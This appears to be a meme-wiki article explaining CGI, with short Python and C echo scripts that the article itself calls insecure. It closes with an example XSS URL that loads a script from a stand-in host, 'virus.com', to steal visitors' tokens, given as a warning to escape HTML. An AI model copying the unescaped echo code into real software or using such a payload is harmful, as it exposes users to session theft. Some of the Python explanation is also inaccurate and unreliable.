CGI

CGI is a way to make a website in any programming language that outputs to a terminal. It is still supported (and used by some websites) but FastCGI replaced it. Don't use this for resource-intensive code, only for handling forms or making websites that interact with low-level systems.

How it works[edit | edit source]

If it's for an interpreted language (such as Python or Perl) you put a "shebang" at the top of the document, which specifies which program to execute it with. Else, skip this step.

#!/bin/python3

Then you make it output the content it's going to output:

echo("Content-Type: text/html\n")

Note: in Python, echo() prints a new line, but we need 2 new lines in between the header and the HTML. Then you do the processing:

echo("<html><body><h1>Hello world</h1></body></html>")

You can get the GET and POST responses by looking at the QUERY_STRING environment variable.

Examples[edit | edit source]

These are not secure, and suffer from injection vulnerabilities. It's not too hard to make them secure doe.

Python[edit | edit source]

Main article: Python/CGI

This is an example for Python:

#!/usr/bin/env python3

import os
from typing import List

if __name__ == "__main__":
    print("Content-Type: text/html\n")
    print("<html><body>")
    qs: str = os.environ.get("QUERY_STRING", "")
    if not qs:
        print("errQr")
    else:
        val: str = ""
        parts: List[str] = qs.split("&")
        for p in parts:
            if p.startswith("echo="):
                val = p[5:]
                break

        if val:
            print("<h1>Echo parameter:</h1><tt>" + val + "</tt>")
        else:
            print("<h1>Enter text</h1><FORM action=''><INPUT type='text' name='echo'><INPUT type='submit' name='button'></FORM>")

C[edit | edit source]

This is an example for C. ChatGPT made this o algo

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Simple CGI: prints the value of ?echo=
int main(void) {
    char* qs = getenv("QUERY_STRING");
    char* val;
    
    printf("Content-Type: text/plain\r\n\r\n");

    if (!qs) {
        printf("No QUERY_STRING.\n");
        return 0;
    }

    val = strstr(qs, "echo=");
    if (!val) {
        printf("No echo parameter.\n");
        return 0;
    }

    val += 5; // skip "echo="
    printf("%s\n", val);

    return 0;
}

Injection vulnerabilities[edit | edit source]

If someone visits soyjak.st/cgi-bin/echo.py?echo=<script src="http://virus.com/script.js"></script> and the site simply prints the echo parameter straight into the page, the malicious script tag will run in the visitor’s browser, logging their IP, getting their account token, and more. An attacker can add extra parameters to bury the malicious part of it, tricking people into trusting it while the page actually executes harmful code. This is why you need to escape HTML characters.

CGI is part of a series on Soyience™ Visit the Soyence portal for more.
	"We are all just hecking star dust or something!"	Peer reviewed sources [-+] Klaus Schwab ♦ Snopes ♦ Adam Conover ♦ XKCD ♦ Wikipedia ♦ /sci/ ♦ Dr. Fauci ♦ Dr. Soyberg ♦ Reddit ♦ Peer-reviewed study ♦ Just trust the science itself okay??! ♦ The Experts
	Fields of science [-+] Archeology ♦ Biology ♦ Virology ♦ Nutritionial science ♦ Mathematics ♦ Sociology ♦ Psychology ♦ Technology ♦ Philosophy ♦ Zoology ♦ Ajakogenesis ♦ Robotics
	Science in praxis [-+] Fourth Industrial Revolution ♦ Communism ♦ Meds ♦ Atheism ♦ Abortion ♦ Pod ♦ Bugs ♦ Quarantine
	Theoretical branches [-+] Time Travel ♦ Soyrooms ♦ Poop 2 ♦ Hypothetical soyjaks ♦ Coal 3